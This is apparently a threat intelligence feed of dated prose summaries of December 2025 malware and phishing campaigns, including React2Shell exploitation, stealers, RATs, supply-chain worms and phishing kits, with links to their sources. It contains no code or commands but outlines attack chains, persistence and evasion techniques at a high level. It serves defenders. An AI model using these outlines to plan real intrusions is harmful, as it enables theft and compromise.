Summary:: https://hackread.com/pystorerat-rat-malware-github-osint-researchers/ Researchers at Morphisec and Hackread have identified PyStoreRAT, an AI-enabled supply chain malware that abuses GitHub to distribute trojanized open source repositories by reactivating dormant accounts and publishing realistic, AI-generated projects such as OSINT tools, DeFi bots, and GPT-related utilities, which later receive update commits that introduce a JavaScript or HTA backdoor; PyStoreRAT operates as a flexible loader capable of system profiling, payload delivery, adaptive execution based on the presence of endpoint security products, self-propagation via removable media, and modular expansion through externally delivered updates, while its use of a rotating command-and-control architecture provides persistence and redundancy across environments, with Russian-language strings in the code suggesting mixed targeting, and overall the campaign reflects an evolution in AI-assisted social engineering that exploits trust in open source ecosystems.

Source: https://www.morphisec.com/blog/pystorerat-a-new-ai-driven-supply-chain-malware-campaign-targeting-it-osint-professionals/

Intel Source:: Zscaler

Intel Name:: BlackForce_Phishing_Kit

Date of Scan:: 2025-12-16

Impact:: HIGH

Summary:: Researchers at Zscaler have identified BlackForce, a commercial phishing kit designed to steal login credentials in real time and bypass multi-factor authentication for widely used online services. The kit is sold on underground forums and distributed through phishing pages that closely replicate legitimate brand login screens. When a user clicks a lure link, BlackForce first verifies that the visitor is a real person—rather than an automated scanner or security researcher before presenting the fraudulent login page. Victims are prompted to enter their username, password, and, in many cases, a one-time authentication code. This information is immediately transmitted to the attacker, who uses an interactive control panel to inject additional fake prompts into the victim’s browser and replay the captured data on the legitimate service to seize the account. All stolen information is ultimately routed to a backend system that can forward the data to messaging channels for operator use.

Source: https://www.zscaler.com/blogs/security-research/technical-analysis-blackforce-phishing-kit

Intel Source:: Google Threat Intelligence Group

Intel Name:: React2Shell_Multi_Actor_Espionage_Cryptomining

Date of Scan:: 2025-12-16

Impact:: LOW

Summary:: Google Threat Intelligence Group (GTIG) reports widespread exploitation of the React2Shell vulnerability (CVE-2025-55182), an unauthenticated RCE flaw in React Server Components used by frameworks such as Next.js . Multiple distinct threat clusters, primarily China-nexus plus at least one Iran-nexus group, are leveraging the bug to deploy tunneling tools, backdoors, and cryptocurrency miners. China-linked cluster UNC6600 uses the flaw to drop the MINOCAT tunneler, gaining persistent covert access to Linux hosts through cron, systemd services, and shell configuration injection. Another China-nexus cluster, UNC6586, deploys the SNOWLIGHT downloader component of the VSHELL backdoor framework, using staged HTTP retrieval of additional payloads disguised as benign files. UNC6588 uses the same vulnerability to distribute the COMPOOD backdoor masquerading as common tools such as Vim, while UNC6603 deploys an updated HISONIC backdoor that hides its configuration behind mainstream cloud services. Cluster UNC6595 installs ANGRYREBEL.LINUX, disguising it as the system’s SSH daemon and applying timestomping and shell history clearing for anti-forensics. In parallel, financially motivated actors rapidly weaponize the vulnerability to install XMRig miners, establishing persistence through new systemd services. Overall, CVE-2025-55182 is enabling both espionage and profit-driven activity against unpatched React/Next.js workloads at global scale.

Source: https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182

Intel Source:: Huntress

Intel Name:: PeerBlight_Linux_Backdoor

Date of Scan:: 2025-12-15

Impact:: MEDIUM

Summary:: Researchers at Huntress have discovered that threat actors are exploiting a critical vulnerability in React Server Components to achieve remote code execution on internet-facing applications, then deploy a newly identified Linux backdoor, dubbed PeerBlight, alongside cryptocurrency mining payloads. PeerBlight enables persistent remote access and supports command execution, file manipulation, and tunneling, allowing attackers to maintain full control of compromised servers long after the initial intrusion. After gaining access, the attackers establish new services and disguise malicious processes to ensure persistence. They also deploy auxiliary tooling that facilitates reverse proxying, SOCKS tunneling, and unauthorized user account creation, enabling long-term footholds in victim environments. PeerBlight’s command-and-control channel features encrypted communications, a domain generation algorithm, and a peer-to-peer fallback layer built on BitTorrent DHT. This multi-layered design significantly increases the resilience of the attacker’s infrastructure against traditional blocking or domain takedown efforts.

Source: https://www.huntress.com/blog/peerblight-linux-backdoor-exploits-react2shell

Intel Source:: Any.Run

Intel Name:: Famous_Chollima_DPRK_IT_Worker_Infiltration

Date of Scan:: 2025-12-14

Impact:: HIGH

Summary:: Researchers at ANY.RUN and NorthScan have identified an ongoing campaign by the Lazarus Group’s Famous Chollima division, which infiltrates Western organizations by posing as legitimate freelance IT workers. The operation employs large-scale social engineering through GitHub, LinkedIn, and Telegram, where DPRK operators masquerade as developers or recruiters to gain employment and internal access to company systems. Once trust is established, victims are persuaded to install remote access software, allowing adversaries full control over their systems and sensitive credentials. The investigation, conducted within a controlled sandbox environment, revealed consistent use of commercial VPNs, browser automation extensions, and identity theft tactics to blend malicious activity with legitimate workflows. Targeting primarily the IT, financial, cryptocurrency, e-commerce, and healthcare sectors, the group seeks to generate revenue and facilitate espionage for the North Korean regime.

Source: https://any.run/cybersecurity-blog/lazarus-group-it-workers-investigation/

Intel Source:: CheckPoint

Intel Name:: Cracking_ValleyRAT

Date of Scan:: 2025-12-14

Impact:: HIGH

Summary:: Check Point researchers have uncovered ValleyRAT, a modular Windows backdoor supported by a comprehensive development ecosystem that includes a GUI-based builder, multiple plugins, and a customized kernel-mode rootkit. The builder generates customized ValleyRAT payloads by allowing operators to select capabilities such as remote desktop control, file and process management, credential harvesting, and host monitoring. A central component is the kernel driver, derived from open-source code but extensively modified to conceal the malware, safeguard its user-mode components, and disrupt with security tooling. It manipulates process structures, hides operational artifacts, and stores configuration data in the registry using make analysis difficult.

Source: https://research.checkpoint.com/2025/cracking-valleyrat-from-builder-secrets-to-kernel-rootkits/

Intel Source:: Splunk

Intel Name:: CastleRAT

Date of Scan:: 2025-12-14

Impact:: MEDIUM

Summary:: Researchers at Splunk have discovered a new remote access trojan (RAT) called CastleRAT, which comes in both Python and C-based versions. It provides attackers extensive control and surveillance capabilities on compromised Windows machines. Once installed, it gathers detailed system information and uses various plugins to capture clipboard data, keystrokes, screenshots, and even audio and video from connected devices. CastleRAT can hijack browser sessions, maintain persistence via rundll32 and scheduled tasks, and bypass UAC by abusing trusted binaries. it employs masquerading techniques and uses “dead drop” locations on legitimate websites to retrieve configuration updates and commands. Altogether, these capabilities make CastleRAT a powerful post-compromise tool that can support credential theft, espionage, and further intrusion once attackers have initial access to a system.

Source: https://www.splunk.com/en_us/blog/security/castlerat-malware-detection-splunk-mitre-attck.html

Intel Source:: G-DATA

Intel Name:: BRAT_Hijacker_Browser_Manipulation_Malware

Date of Scan:: 2025-12-13

Impact:: MEDIUM

Summary:: Researchers at G DATA CyberDefense have identified a series of browser hijacking techniques used by multiple malware families that target Chromium-based browsers and Firefox. The investigation highlights three distinct mechanisms of compromise, revealing how modern hijackers maintain persistence and evade detection. The first technique involves tampering with browser preference files—such as Chrome’s Secure Preferences or Firefox’s prefs.js—to alter default settings like homepage or search engine configurations, bypassing integrity checks through regenerated HMAC values derived from system data. The second, named BRAT (browser remote access tool), demonstrates the use of automated keystroke emulation to remotely control browser interactions, enabling actions such as tab navigation, clipboard exfiltration, and forced redirections. The third technique leverages a combination of PowerShell and VBScript to disable Chrome’s auto-update policy and install unauthorized extensions via deprecated command-line switches, effectively preventing remediation through normal software updates. Collectively, these techniques show a progression from configuration tampering to full browser automation, representing a growing threat vector that blends persistence, user deception, and credential theft potential.

Source: https://www.gdatasoftware.com/blog/2025/11/38298-learning-about-browser-hijacking

Intel Source:: Seqrite Labs

Intel Name:: MoneyMount_ISO_Phantom_Stealer_via_ISO_Files

Date of Scan:: 2025-12-13

Impact:: HIGH

Summary:: Researchers at Seqrite Labs have identified an ongoing phishing campaign, dubbed Operation MoneyMount-ISO, that delivers the Phantom Stealer malware through malicious ISO-mounted executables. The campaign, originating from Russia, employs payment-confirmation–themed phishing emails written in Russian and designed to impersonate legitimate financial correspondence. The attached ZIP archive contains an ISO image that mounts automatically and executes a disguised payload, leading to the deployment of Phantom Stealer. Once active, the malware conducts multi-stage data theft operations, including credential extraction from browsers, Discord token harvesting, cryptocurrency wallet exfiltration, and clipboard and keylogging surveillance. Technical analysis indicates that the malware leverages steganography, anti-virtualization checks, and self-deletion routines to evade detection. Data exfiltration is achieved through multiple channels such as Telegram bots, Discord webhooks, and FTP servers, highlighting a sophisticated exfiltration architecture.

Source: https://www.seqrite.com/blog/operation-moneymount-iso-deploying-phantom-stealer-via-iso-mounted-executables/

Intel Source:: WIZ

Intel Name:: Gogs_RCE_Bypass_Actively_Exploited

Date of Scan:: 2025-12-12

Impact:: HIGH

Summary:: Researchers at Wiz have identified active exploitation of a previously unknown vulnerability in Gogs, a self-hosted Git service. The flaw, tracked as CVE-2025-8110, is a symbolic link bypass that reopens a remote code execution vector thought to be patched under CVE-2024-55947. The vulnerability allows authenticated users to overwrite files outside the repository directory, enabling arbitrary command execution through modification of Git configuration files. Wiz’s investigation began after detecting malware on a customer’s cloud workload, which was traced to this Gogs zero-day. The threat actor leveraged open registration features and API misuse to compromise exposed instances, with over half of observed Gogs servers showing infection signs.

Source: https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit

Intel Source:: Elastic Security Labs

Intel Name:: NANOREMOTE_Windows_Backdoor

Date of Scan:: 2025-12-12

Impact:: MEDIUM

Summary:: Researchers from Elastic Security Labs have uncovered a new Windows backdoor called NANOREMOTE, delivered through a deceptive loader known as WMLOADER, which masquerades as legitimate security software. The developers behind this tool appear to be the same espionage-focused group previously associated with the FINALDRAFT implant, as indicated by overlapping code and shared cryptographic routines. Once deployed, NANOREMOTE provides attackers with extensive remote-access capabilities, including command execution, host reconnaissance, file manipulation, and in-memory execution of additional payloads. Its flexible beaconing and task-based architecture enable sustained, interactive operations. To evade detection, the malware leverages Google Drive and other common cloud services for payload staging and data exfiltration, allowing its traffic to blend seamlessly with legitimate network activity. WMLOADER further enhances stealth by using an invalid code signature and encrypted shellcode to evade basic security controls.

Source: https://www.elastic.co/security-labs/nanoremote

Intel Source:: Sophos

Intel Name:: React2Shell_RCE_Exploitation_Campaign

Date of Scan:: 2025-12-12

Impact:: HIGH

Summary:: Researchers at Sophos Counter Threat Unit (CTU) have identified widespread exploitation of CVE-2025-55182, a critical remote code execution vulnerability in React Server Components, referred to as React2Shell. The flaw stems from unsafe deserialization of network requests in the React “Flight” protocol, allowing attackers to send a single malicious HTTP request to execute arbitrary JavaScript on affected servers without authentication. Exploitation activity has been observed targeting versions 19.0.0 through 19.2.0 of React, with numerous compromised systems deploying multi-stage Linux loaders designed for persistence via cron jobs, systemd, and rc.local. Sophos analysts report that these payloads included obfuscated JavaScript components using AES-256-CBC encryption to conceal follow-on malware and anti-forensic measures to delete installer traces.

Source: https://news.sophos.com/en-us/2025/12/11/react2shell-flaw-cve-2025-55182-exploited-for-remote-code-execution/

Intel Source:: Huntress

Intel Name:: Fake_AI_Pages_Drop_AMOS_Malware

Date of Scan:: 2025-12-12

Impact:: MEDIUM

Summary:: Researchers from Huntress have uncovered an AMOS Stealer campaign that uses AI-themed troubleshooting pages and search-engine manipulation to lure macOS users. The attack begins when users search for routine Mac maintenance help and are directed to attacker-controlled pages mimicking AI assistants like ChatGPT or Grok. Within these fake chat interfaces, victims are instructed to run benign Terminal commands that actually download and execute a hidden stealer loader. Once active, the malware silently collects system credentials, browser data, and cryptocurrency wallet information while avoiding any visible signs of installation. It persists using standard macOS mechanisms—including LaunchDaemons and user-level watchdog scripts—ensuring it re-launches after reboots or termination attempts. The stealer also checks for virtual machine environments before fully deploying and exfiltrates stolen data to attacker-controlled servers. This campaign exploits user trust in search results, AI chat interfaces, and copy-paste workflows, targeting everyday macOS users, particularly those handling cryptocurrency or sensitive browser-based accounts.

Source: https://www.huntress.com/blog/amos-stealer-chatgpt-grok-ai-trust

Intel Source:: Sysdig Threat Research Team

Intel Name:: EtherRAT_DPRK_Ethereum_implant_via_React2Shell

Date of Scan:: 2025-12-11

Impact:: LOW

Summary:: The Sysdig Threat Research Team reports EtherRAT, a Node.js-based persistent implant deployed via React2Shell (CVE-2025-55182). The malware uses blockchain-based C2 resolution through Ethereum smart contracts, a four-stage delivery chain, and AES-encrypted payloads. It downloads a legitimate Node.js runtime to reduce detection and installs five Linux persistence mechanisms for durable access. EtherRAT polls nine RPC endpoints for resilient C2 and supports self-updating to evade signatures. While attribution is not confirmed, several techniques overlap with DPRK “Contagious Interview” tooling. The implant provides operators full asynchronous JavaScript execution for continued reconnaissance and tasking

Source: https://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks

Intel Source:: CERT AGID

Intel Name:: PA_Email_Compromise_via_Malicious_PDFs

Date of Scan:: 2025-12-11

Impact:: MEDIUM

Summary:: Researchers at CERT-AGID have identified an ongoing phishing campaign targeting Italian Public Administration (PA) entities through the use of compromised institutional email accounts. The attackers leverage these accounts to distribute convincing emails containing malicious PDF attachments that appear to be legitimate document notifications. When recipients open the attached PDF, they are prompted to click a “Review Documents” button, which redirects them to a genuine Figma login page, exploiting the platform’s legitimacy to collect user credentials. Once the victim attempts to authenticate using an email or Google account, the attackers gain access to real user identifiers and potentially sensitive login information. CERT-AGID confirmed that two PA administrations have been compromised so far, with further spread not ruled out.

Source: https://cert-agid.gov.it/news/campagna-malevola-in-atto-abusa-di-utenze-pa-tramite-allegati-pdf-e-accesso-a-figma/

Intel Source:: Reliaquest

Intel Name:: Storm_0249_Shifts_to_Precision_Post_Exploitation

Date of Scan:: 2025-12-10

Impact:: HIGH

Summary:: ReliaQuest researchers have identified Storm-0249 as a financially motivated initial access broker that has shifted from broad phishing campaigns to more targeted post-exploitation operations aimed at hijacking trusted endpoint security processes. The group leverages a legitimate SentinelOne helper process to sideload a malicious DLL, enabling SYSTEM-level execution and long-term persistence through MSI installers. After delivering these deceptive installers via Microsoft-themed infrastructure, the attackers use curl and PowerShell commands to deploy fileless payloads that execute directly in memory. Once inside a network, Storm-0249 performs extensive host reconnaissance using built-in Windows utilities and registry queries, collecting identifiers such as MachineGuid, which ransomware affiliates can later use to bind encryption keys to specific victims. The group also routes its command-and-control traffic through the same SentinelOne process, causing malicious TLS communications to blend in with legitimate EDR telemetry.

Source: https://reliaquest.com/blog/threat-spotlight-storm-0249-precision-endpoint-exploitation

Intel Source:: Palo Alto

Intel Name:: OFLIP_Ransomware

Date of Scan:: 2025-12-10

Impact:: HIGH

Summary:: Researchers at Palo Alto Networks have uncovered a financially motivated threat group, known as CL-CRI-1036, using a new Rust-based ransomware called OFLIP to target organizations in the Asia-Pacific region. The attackers gain access through manual intrusions and use the Sliver framework for command-and-control and lateral movement across both Windows and Linux environments. The ransomware is designed to work quickly rather than stealthily. It scans available drives, encrypts user files, and drops ransom notes writable directories while excluding specific file types to keep systems functional. After encrypting data, it tries to delete and overwrite its own files to make detection harder. The operators demand payment in cryptocurrency and threaten to leak stolen data on underground forums, although the malware itself has no built-in exfiltration capability, suggesting the use of separate tools or potential bluffing.

Source: https://unit42.paloaltonetworks.com/new-ransomware-01flip-written-in-rust/

Intel Source:: KOI Security

Intel Name:: BigBlack_Malicious_VS_Code_Extensions

Date of Scan:: 2025-12-10

Impact:: HIGH

Summary:: Researchers at Koi Security have identified a campaign distributing malicious Visual Studio Code extensions that exfiltrate sensitive developer data through stealthy infostealer payloads. The operation leverages two extensions—one disguised as a cryptocurrency-themed color scheme and another posing as an AI coding assistant—to target developers with varying social engineering lures. Once installed, these extensions execute hidden scripts that download additional payloads capable of capturing screenshots, harvesting WiFi credentials, and stealing browser session tokens. The malware employs DLL hijacking to conceal its activity under legitimate processes, ensuring persistence and evasion of security controls. Analysis of multiple versions revealed iterative refinement by the threat actor, who improved reliability and stealth across updates while maintaining the same command infrastructure and payload delivery chain. Victimology points to software developers and technical professionals, particularly those interested in cryptocurrency or AI-enhanced development tools.

Source: https://www.koi.ai/blog/the-vs-code-malware-that-captures-your-screen

Intel Source:: ISC.SANS

Intel Name:: AutoIT3_Loader_Shellcode_via_FileInstall_Abuse

Date of Scan:: 2025-12-09

Impact:: HIGH

Summary:: Researchers at the SANS Internet Storm Center have identified a renewed wave of malicious activity leveraging AutoIT3-compiled scripts as loaders for shellcode execution. AutoIT3, a Windows automation language, is being abused by threat actors to embed and execute payloads through its FileInstall() function, allowing malicious files to be packed directly into compiled executables. The observed campaigns demonstrate how attackers use this feature to unpack obfuscated payloads into temporary directories and execute them in memory, effectively bypassing traditional endpoint defenses. The scripts employ lightweight obfuscation routines to conceal shellcode loading logic, ultimately invoking Windows API calls such as CallWindowProc() to execute malicious code. This technique has been linked to the distribution of remote access and data theft tools, indicating an adaptable and ongoing use of AutoIT3 as a loader platform.

Source: https://isc.sans.edu/index_cached.html

Intel Source:: Google Threat Intelligence

Intel Name:: Intellexa_Ongoing_Zero_Day_Exploits_Persist

Date of Scan:: 2025-12-09

Impact:: HIGH

Summary:: Researchers at Google’s Threat Intelligence Group (GTIG) have identified continued offensive cyber operations conducted by the commercial spyware vendor Intellexa, which remains active despite international sanctions and prior exposure. The group has repeatedly developed and deployed zero-day exploit chains targeting major mobile platforms including iOS and Android, often chaining vulnerabilities in Chrome and Safari to achieve remote code execution and privilege escalation. GTIG’s analysis highlights Intellexa’s sustained ability to procure or develop new zero-days rapidly, indicating a robust exploit acquisition network and a high level of technical sophistication. The exploits have been leveraged to deliver Predator spyware, a tool capable of extensive surveillance, including microphone and camera capture, keylogging, and VOIP recording. Recent campaigns have been observed in regions such as Egypt and Saudi Arabia, with delivery mechanisms relying on one-time links and messaging app redirections.

Source: https://cloud.google.com/blog/topics/threat-intelligence/intellexa-zero-day-exploits-continue/

Intel Source:: Trustwave and Iru

Intel Name:: Shai_Hulud_2_GitHub_NPM_Worm

Date of Scan:: 2025-12-09

Impact:: HIGH

Summary:: Researchers at Trustwave SpiderLabs and Iru have identified Shai-Hulud 2.0, a sophisticated self-replicating malware targeting the Node Package Manager (NPM) ecosystem and GitHub-based CI/CD pipelines. The threat actors behind this campaign exploited a GitHub Actions injection vulnerability to steal NPM publishing tokens, allowing them to distribute maliciously modified NPM packages. Once installed, the malware executes JavaScript-based payloads that harvest authentication credentials and API tokens from cloud platforms including GitHub, AWS, GCP, and Azure. It also propagates automatically by republishing infected packages under compromised developer accounts. The malware establishes persistence by registering the infected host as a GitHub self-hosted runner and abuses GitHub Discussions as a covert command and control mechanism.

Source: https://the-sequence.com/investigating-shai-hulud https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/sha1-hulud-the-second-coming-of-the-new-npm-github-worm/

Intel Source:: Hunt.IO

Intel Name:: VSCode_Extension_Drops_Anivia_Loader_and_OctoRAT

Date of Scan:: 2025-12-09

Impact:: HIGH

Summary:: Researchers at Hunt.io have uncovered a supply-chain compromise targeting developers through the Visual Studio Code extension ecosystem, where attackers published a fake Prettier extension under a deceptive publisher profile and delivered a staged attack chain involving a VBScript dropper, an Anivia loader and finally the OctoRAT remote access toolkit. The initial payloads were fetched from a public code repository and relied on AES encryption and process hollowing to stay in memory, while Anivia decrypted and executed OctoRAT inside a legitimate .NET system binary to avoid reputation-based defenses. The scans also found multiple active control panels tied together by shared TLS certificate infrastructure and hosted across European providers.

Source: https://hunt.io/blog/malicious-vscode-extension-anivia-octorat-attack-chain

Intel Source:: Volexity

Intel Name:: Russian_Actor_Spoofs_European_Security_Events

Date of Scan:: 2025-12-08

Impact:: MEDIUM

Summary:: Researchers have identified that the Russian state-linked group UTA0355 is conducting highly targeted phishing campaigns by impersonating legitimate European security and policy conferences. The actors create polished registration websites for events such as the Belgrade Security Conference and use tailored phishing emails along with follow-up conversations over WhatsApp or Signal to draw in selected Microsoft 365 users. Once credentials are obtained, the attackers access mailboxes and files, register new devices in Entra ID to maintain long-term persistence, and route follow-on activity through proxy infrastructure to obscure their location and blend in with normal user behavior. The group also acquires lookalike domains and leverages obscure email services to build additional conference-themed infrastructure, demonstrating strong social-engineering capabilities and an increasingly mature approach to cloud identity abuse.

Source: https://www.volexity.com/blog/2025/12/04/dangerous-invitations-russian-threat-actor-spoofs-european-security-events-in-targeted-phishing-attacks/

Intel Source:: Malwarebytes

Intel Name:: ShadyPanda_Sleeper_Spyware_Extensions

Date of Scan:: 2025-12-08

Impact:: HIGH

Summary:: Researchers at Malwarebytes have identified a large-scale spyware campaign leveraging long-dormant Chrome and Edge browser extensions that turned malicious after years of normal behavior. The campaign, linked to the threat group ShadyPanda, affected approximately 4.3 million devices worldwide. Initially published as legitimate tools, the extensions later transformed into a remote code execution platform capable of downloading and executing malicious JavaScript within the browser environment. This allowed attackers to monitor user activity, including visited websites and search queries, and to transmit collected data to infrastructure controlled by actors believed to be operating from China. One of the most widespread extensions, WeTab, accumulated millions of installations before exhibiting malicious behavior.

Source: https://www.malwarebytes.com/blog/news/2025/12/sleeper-browser-extensions-woke-up-as-spyware-on-4-million-devices

Intel Source:: 360 Threat Intelligence Center

Intel Name:: Gamaredon_Exploits_CVE_2025_8088_in_Phishing

Date of Scan:: 2025-12-08

Impact:: MEDIUM

Summary:: Researchers at the 360 Threat Intelligence Center have observed that APT-C-53 (Gamaredon), a Russia-aligned espionage group active since at least 2013, is escalating its operations against Ukrainian government and military targets in 2025. The campaign abuses a newly disclosed WinRAR directory-traversal flaw, CVE-2025-8088, to deliver spear-phishing archives that quietly drop HTA malware into the Windows startup folder. When opened, the crafted archive writes a hidden payload to a persistence path that executes at the next login, launching a VBScript downloader that fetches a second-stage script from a remote command server. The second stage uses Gamaredon’s typical multi-layer obfuscation, including string replacement and Base64 decoding, to rebuild modules that collect system information, establish C2 communication, deploy extra persistence techniques, and create disguised scheduled tasks for long-term access.

Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247507617&idx=1&sn=9a64ed18ff9ef62dc3e66b76b1ac6a8b&poc_token=HKWjNmmjSO_ORPHgzOWBy8PUxksBUYloflvqDQ20

Intel Source:: Fortinet

Intel Name:: UDPGangster_MuddyWater_Espionage_Campaigns

Date of Scan:: 2025-12-07

Impact:: HIGH

Summary:: Researchers at FortiGuard Labs have identified a new wave of espionage-focused campaigns conducted by the MuddyWater threat group deploying a UDP-based backdoor known as UDPGangster. The operation employs malicious Microsoft Word documents containing VBA macros to deliver the malware, which executes once victims enable embedded content. The payload uses the Windows API to decode and run concealed data, establishing command and control over UDP to avoid traditional network detection. Once installed, UDPGangster achieves persistence via registry keys and mutex creation while enabling remote code execution, file exfiltration, and payload updates. The malware incorporates extensive anti-analysis measures, including debugger, hardware, and sandbox detection, ensuring it operates only on genuine systems. FortiGuard analysts observed active campaigns targeting government and educational sectors in Turkey, Israel, and Azerbaijan, using localized phishing lures to improve delivery success. The consistency in TTPs, infrastructure, and document macros links the campaigns to MuddyWater’s ongoing regional espionage activity, highlighting a sustained and technically capable threat actor with strong operational security.

Source: https://www.fortinet.com/blog/threat-research/udpgangster-campaigns-target-multiple-countries

Intel Source:: Securonix Threat Research

Intel Name:: JSSMUGGLER_Multi_Stage_JavaScript_RAT_Loader

Date of Scan:: 2025-12-07

Impact:: HIGH

Summary:: Researchers at Securonix Threat Research have identified a sophisticated multi-stage web-based intrusion campaign known as JSSMUGGLER, which employs advanced obfuscation and stealth techniques to deliver the NetSupport Remote Access Trojan (RAT). The campaign begins with the injection of an obfuscated JavaScript loader into compromised websites, designed to evade detection through junk text, encoded strings, and dynamic runtime execution. Once executed, the loader determines the victim’s environment, using device-aware logic to deliver a secondary HTML Application (HTA) payload executed through mshta.exe. This HTA stage decrypts and executes a PowerShell stager entirely in memory, bypassing standard execution policies and security controls. The final stage deploys the NetSupport RAT, providing the attacker with persistent remote access, file manipulation, keylogging, and surveillance capabilities.

Source: https://www.securonix.com/blog/jssmuggler-multi-stage-hidden-iframes-obfuscated-javascript-silent-redirectors-netsupport-rat-delivery/

Intel Source:: Crowdstrike

Intel Name:: WARP_PANDA_China_Nexus_vCenter_Intrusions

Date of Scan:: 2025-12-07

Impact:: HIGH

Summary:: Researchers at CrowdStrike have identified a newly designated China-nexus threat actor known as WARP PANDA, responsible for multiple intrusions throughout 2025 targeting VMware vCenter and ESXi environments across U.S.-based legal, technology, and manufacturing sectors. The group demonstrates a high degree of technical sophistication and operational security, emphasizing persistence and covert access to compromised cloud and virtualization infrastructure. WARP PANDA employs a custom malware toolkit including BRICKSTORM, Junction, and GuestConduit, all written in Golang and designed for tunneling, persistence, and stealth within virtualized networks. The adversary leverages unregistered virtual machines, file timestamp manipulation, and masquerading as legitimate vCenter processes to evade detection.

Source: https://www.crowdstrike.com/en-us/blog/warp-panda-cloud-threats/

Intel Source:: ISC.SANS

Intel Name:: SSH_Trojan_via_Government_IP_Compromise

Date of Scan:: 2025-12-07

Impact:: HIGH

Summary:: Researchers at the SANS Internet Storm Center (ISC) identified an intrusion involving a sophisticated SSH-based trojan deployment following a brute-force compromise of a honeypot system. The attack began with an automated login attempt using default credentials, after which the threat actor established a brief connection and uploaded a trojan masquerading as a legitimate SSH daemon. Analysis revealed the malware was engineered for persistence, credential harvesting, privilege escalation, and defense evasion, demonstrating a high degree of operational discipline. The malicious activity mapped to multiple MITRE ATT&CK techniques, including valid account abuse, brute-force authentication, and client software compromise. Investigators noted the source IP address originated from a government network, but emphasized this likely reflected a compromised asset rather than direct state involvement.

Source: https://isc.sans.edu/diary/rss/32536

Intel Source:: Recorded Future

Intel Name:: Intellexa_Predator_Spyware_Network

Date of Scan:: 2025-12-06

Impact:: HIGH

Summary:: Researchers at Insikt Group have identified an extensive network of companies and individuals connected to Intellexa and its flagship Predator spyware, revealing a persistent global ecosystem supporting surveillance-for-hire operations. The investigation exposes a complex web of front companies, intermediaries, and infrastructure spanning Europe, the Middle East, and Africa, with active entities registered in Greece, North Macedonia, the Czech Republic, and the United Arab Emirates. Predator is a modular spyware framework capable of full device compromise through both one-click and zero-click exploits, granting operators access to sensitive device data including messages, calls, and camera feeds. Insikt Group’s analysis shows that despite sanctions, exposure, and legal scrutiny, Intellexa-linked companies continue to operate under new identities and regional affiliates to obscure attribution and sustain commercial activity.

Source: https://www.recordedfuture.com/research/intellexas-global-corporate-web

Intel Source:: Spider Labs

Intel Name:: Executive_Award_Campaign

Date of Scan:: 2025-12-06

Impact:: MEDIUM

Summary:: Researchers at SpiderLabs have uncovered a phishing campaign that uses an “Executive Award” theme to lure victims into credential theft and malware installation. The operation begins with emails claiming to relate to a corporate recognition or gift-card program, directing users to a convincing phishing site that mimics an internal award or webmail portal. When victims submit their credentials, the data is immediately exfiltrated to attacker-controlled infrastructure, including a Telegram channel. The site then displays a fake browser error and prompts users to download a supposed “fix” file, leveraging the ClickFix technique to execute concealed PowerShell code via Windows messaging features. This PowerShell stage ultimately downloads and installs the Stealerium information stealer, which operates silently to harvest additional data and establish persistence for long-term access.

Source: https://x.com/SpiderLabs/status/1995639456028926169

Intel Source:: Huntress

Intel Name:: A_Misuse_of_Velociraptor

Date of Scan:: 2025-12-05

Impact:: MEDIUM

Summary:: Researchers at Huntress uncovered an espionage campaign in which a threat actor abused the Velociraptor DFIR platform and other legitimate administrative tools to establish covert C2 across multiple victim environments. The actor initially breached networks by exploiting vulnerable Windows web services, then installed Velociraptor as a persistent service with elevated privileges. After gaining a foothold, they relied on cloud tunneling services, remote desktop utilities, and encoded PowerShell to move laterally, enumerate Active Directory, and execute arbitrary commands while closely mimicking normal administrative activity. In one instance, the intrusion culminated in the deployment of Warlock ransomware, with Velociraptor enabling continued access during and following the encryption event. Confirmed victims include an agriculture organization, a managed service provider’s internal network, and another enterprise.

Source: https://www.huntress.com/blog/velociraptor-misuse-part-two-eye-of-the-storm

Intel Source:: Cyble

Intel Name:: V3G4_Botnet_Evolves

Date of Scan:: 2025-12-05

Impact:: MEDIUM

Summary:: Cyble researchers have identified a new V3G4 campaign, a Mirai-based botnet that has evolved beyond its usual DDoS attacks to secretly run cryptomining on compromised Linux devices. The operation uses a multi-stage infection chain, beginning with a downloader script designed to work across many CPU architectures, making it effective against a wide range of servers and embedded systems. Once inside, it deploys a custom bot that gathers system details, manipulates with system services, and establishes resilient communication with its C2 servers. The malware also performs TCP scanning and uses DNS-based C2 resolution, enabling it to discover additional targets and remain connected even if the attackers update their infrastructure. In later stages, the operators deploy a fileless cryptominer whose configuration is delivered at runtime, leaving minimal traces on disk and complicating forensic analysis.

Source: https://cyble.com/blog/v3g4-mirai-botnet-evolves/

Intel Source:: Cert-AGID

Intel Name:: Phishing_Campaign_Masquerades_Italy_Presidency_Website

Date of Scan:: 2025-12-04

Impact:: MEDIUM

Summary:: CERT-AGID researchers have identified a phishing campaign that impersonates the Italian Government and the Presidency of the Council of Ministers to harvest online banking credentials. The operation begins with emails titled “Verification of Banking Data – Italian Government,” urging recipients to click a link presented as part of a routine administrative check. The embedded link directs victims to a webpage that replicates the official branding and visual identity of the Presidency, creating a strong sense of legitimacy. From there, users are presented with a bank selection drop-down listing numerous national and international credit institutions, after which they are redirected to a counterfeit portal for the chosen bank. These fraudulent portals closely mimic legitimate online banking login pages to capture customer IDs, PINs, and passwords. The campaign relies on brand impersonation and high-quality visual replicas rather than malware, reducing technical complexity while still posing a significant fraud risk.

Source: https://cert-agid.gov.it/news/in-atto-una-campagna-di-phishing-che-sfrutta-le-insegne-del-governo-per-sottrarre-dati-bancari/

Intel Source:: Zscaler

Intel Name:: matanbuchus_3_0_modular_downloader_with_ransomware_aligned_capabilities

Date of Scan:: 2025-12-04

Impact:: LOW

Summary:: Researchers at Zscaler ThreatLabz have identified a new and more advanced variant of the Matanbuchus Malware-as-a-Service platform, marking a substantial evolution in its deployment and post-exploitation capabilities. Matanbuchus 3.0 introduces enhanced obfuscation, Protobuf-based C2 communication, and long-running anti-analysis delays, making it significantly harder to detect. Recent intrusions show threat actors using Quick Assist–enabled access to deploy trojanized MSI installers that sideload the downloader module, which then retrieves the main payload from attacker infrastructure. The updated variant expands its ability to execute EXEs, DLLs, MSI packages, and shellcode through multiple injection pathways while establishing persistence via scheduled tasks. These advancements strengthen its utility for ransomware-aligned operators and increase its impact across Windows environments

